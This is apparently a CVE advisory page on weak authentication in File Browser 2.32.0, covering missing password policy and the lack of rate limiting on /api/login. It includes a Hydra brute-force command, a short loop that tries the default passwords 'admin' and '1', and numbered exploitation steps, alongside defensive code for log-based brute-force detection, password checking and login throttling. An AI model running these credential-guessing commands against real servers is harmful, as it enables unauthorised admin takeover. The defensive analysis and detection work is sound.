How the CVE Works
File Browser lacks password policy enforcement and brute-force protection, allowing attackers to exploit weak credentials. Default passwords like `admin` and trivial user-set passwords (e.g., `1`) go unchecked. The `/api/login` endpoint permits unlimited authentication attempts, so credentials can be brute-forced. Without rate limiting or a lockout mechanism, repeated password guesses can compromise any account, including the admin account.
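For a defender, the observable side of this weakness is a burst of failed `POST /api/login` requests from one source, sometimes followed by a success. The following detection routine is an added example, not code from the page or from the File Browser project: it parses constructed access-log lines (the log format and the 403-on-failure status are assumptions, so the regex would need adjusting to the real server logs) and flags any source that exceeds a failure threshold inside a sliding window, noting whether a successful login followed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (not taken from the page). The format
# "<timestamp> <client-ip> <method> <path> <status>" is an assumption.
SAMPLE_LOG = """\
2025-06-26T10:00:01Z 203.0.113.5 POST /api/login 403
2025-06-26T10:00:02Z 203.0.113.5 POST /api/login 403
2025-06-26T10:00:03Z 203.0.113.5 POST /api/login 403
2025-06-26T10:00:04Z 203.0.113.5 POST /api/login 403
2025-06-26T10:00:05Z 203.0.113.5 POST /api/login 403
2025-06-26T10:00:06Z 203.0.113.5 POST /api/login 200
2025-06-26T10:00:07Z 198.51.100.9 POST /api/login 403
2025-06-26T10:00:09Z 198.51.100.9 GET /api/resources 200
2025-06-26T10:05:00Z 198.51.100.9 POST /api/login 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse(line):
    """Split one log line into (timestamp, ip, method, path, status) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, ip, method, path, status = m.groups()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, method, path, int(status)


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: (peak_failures_in_window, success_after_failures)} for every
    source whose failed /api/login attempts within `window` reach `threshold`."""
    attempts = defaultdict(list)  # ip -> [(timestamp, status), ...]
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, ip, method, path, status = rec
        if method == "POST" and path == "/api/login":
            attempts[ip].append((ts, status))

    alerts = {}
    for ip, events in attempts.items():
        events.sort()
        fails = [t for t, s in events if s != 200]
        # Sliding window over failure timestamps: find the densest burst.
        lo, peak = 0, 0
        for hi in range(len(fails)):
            while fails[hi] - fails[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            last_fail = fails[-1]
            # A success after the burst is the strongest signal of a guessed password.
            success_after = any(s == 200 and t > last_fail for t, s in events)
            alerts[ip] = (peak, success_after)
    return alerts


if __name__ == "__main__":
    for ip, (count, success) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} failed logins in window, success afterwards: {success}")
```

On the constructed sample the routine flags `203.0.113.5` (five failures in four seconds, then a 200) and ignores `198.51.100.9`, whose single failure followed by a success minutes later looks like an ordinary typo.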
DailyCVE Form
Platform: File Browser
Version: 2.32.0
Vulnerability: Weak auth
Severity: Critical
Date: 2025-06-26
Prediction: Patch by 2025-06-29
What Undercode Say
Analytics:
```bash
hydra -l admin -P wordlist.txt filebrowser.local http-post-form "/api/login:username=^USER^&password=^PASS^:F=403"
```

```python
import requests

weak_passwords = ["admin", "1"]  # the default and trivial values named on this page
for p in weak_passwords:
    r = requests.post("http://filebrowser.local/api/login", json={"username": "admin", "password": p})
    print(p, r.status_code)  # the endpoint never throttles or locks out repeated attempts
```
How Exploit
1. Use default creds `admin:admin`.
2. Brute-force `/api/login` via Hydra/Burp.
3. Exploit weak user-set passwords (e.g., `1`).
Protection from this CVE
1. Enforce NIST SP 800-63B policies.
2. Implement rate-limiting.
3. Require password changes.
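The three protections above translate into two pieces of server-side logic: a password acceptance check and a login throttle. The block below is an added example written for this page, not File Browser's own code or a patch to it. The blocklist is a constructed stand-in for a real breached-password list, and the `LoginThrottle` class is one design (per-account plus per-source sliding window with a temporary lockout), chosen here to show what NIST SP 800-63B and "implement rate-limiting" mean in practice.

```python
import time
from collections import defaultdict, deque

# Constructed stand-in for a breached/common-password list. NIST SP 800-63B asks
# verifiers to screen new passwords against such a list rather than impose
# composition rules (uppercase, digits, symbols).
COMMON_PASSWORDS = {"admin", "password", "123456", "1", "filebrowser", "qwerty"}


def check_password(candidate, username, min_len=8, max_len=64):
    """Return a list of policy violations; an empty list means the password is accepted.
    Follows SP 800-63B: minimum 8 characters, accept at least 64, reject values on
    the blocklist, reject the username itself, no composition rules."""
    problems = []
    if len(candidate) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if len(candidate) > max_len:
        problems.append(f"longer than {max_len} characters")
    if candidate.lower() in COMMON_PASSWORDS:
        problems.append("appears in the common-password blocklist")
    if username and candidate.lower() == username.lower():
        problems.append("equals the username")
    return problems


class LoginThrottle:
    """Sliding-window failure counter keyed by account and by source address.
    Reaching max_failures inside `window` seconds locks that key for `lockout` seconds.
    The injectable clock exists so the behaviour can be driven deterministically."""

    def __init__(self, max_failures=5, window=60.0, lockout=300.0, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.lockout = lockout
        self.clock = clock
        self.failures = defaultdict(deque)  # key -> recent failure timestamps
        self.locked_until = {}              # key -> time at which the lock expires

    @staticmethod
    def _keys(username, source_ip):
        return (("user", username.lower()), ("ip", source_ip))

    def _prune(self, key, now):
        q = self.failures[key]
        while q and now - q[0] > self.window:
            q.popleft()

    def allowed(self, username, source_ip):
        """Call before verifying credentials; False means reject without checking."""
        now = self.clock()
        for key in self._keys(username, source_ip):
            until = self.locked_until.get(key)
            if until is not None:
                if now < until:
                    return False
                del self.locked_until[key]  # lock expired
        return True

    def record_failure(self, username, source_ip):
        now = self.clock()
        for key in self._keys(username, source_ip):
            self._prune(key, now)
            self.failures[key].append(now)
            if len(self.failures[key]) >= self.max_failures:
                self.locked_until[key] = now + self.lockout
                self.failures[key].clear()

    def record_success(self, username, source_ip):
        # Reset the account counter; keep the per-source counter, since a success
        # from a source that has been guessing is still worth rate limiting.
        self.failures.pop(("user", username.lower()), None)


def simulate():
    """Drive the throttle with a fake clock: five failures lock the account for 300 s,
    also from a different source address, and the lock expires afterwards."""
    t = [0.0]
    th = LoginThrottle(clock=lambda: t[0])
    for _ in range(5):
        if not th.allowed("admin", "203.0.113.5"):
            raise RuntimeError("locked too early")
        th.record_failure("admin", "203.0.113.5")
        t[0] += 1.0
    locked = not th.allowed("admin", "203.0.113.5")
    locked_other_ip = not th.allowed("admin", "198.51.100.9")
    t[0] += 301.0
    unlocked = th.allowed("admin", "203.0.113.5")
    return locked, locked_other_ip, unlocked


if __name__ == "__main__":
    print(check_password("admin", "admin"))
    print(check_password("correct horse battery staple", "admin"))
    print(simulate())
```

The per-account key is what stops a distributed guess against `admin`; the per-source key is what stops one address from spraying many accounts. Both are needed, and neither replaces the password check, which is what keeps `admin:admin` from being valid in the first place.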
Impact
Full account compromise, admin takeover.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

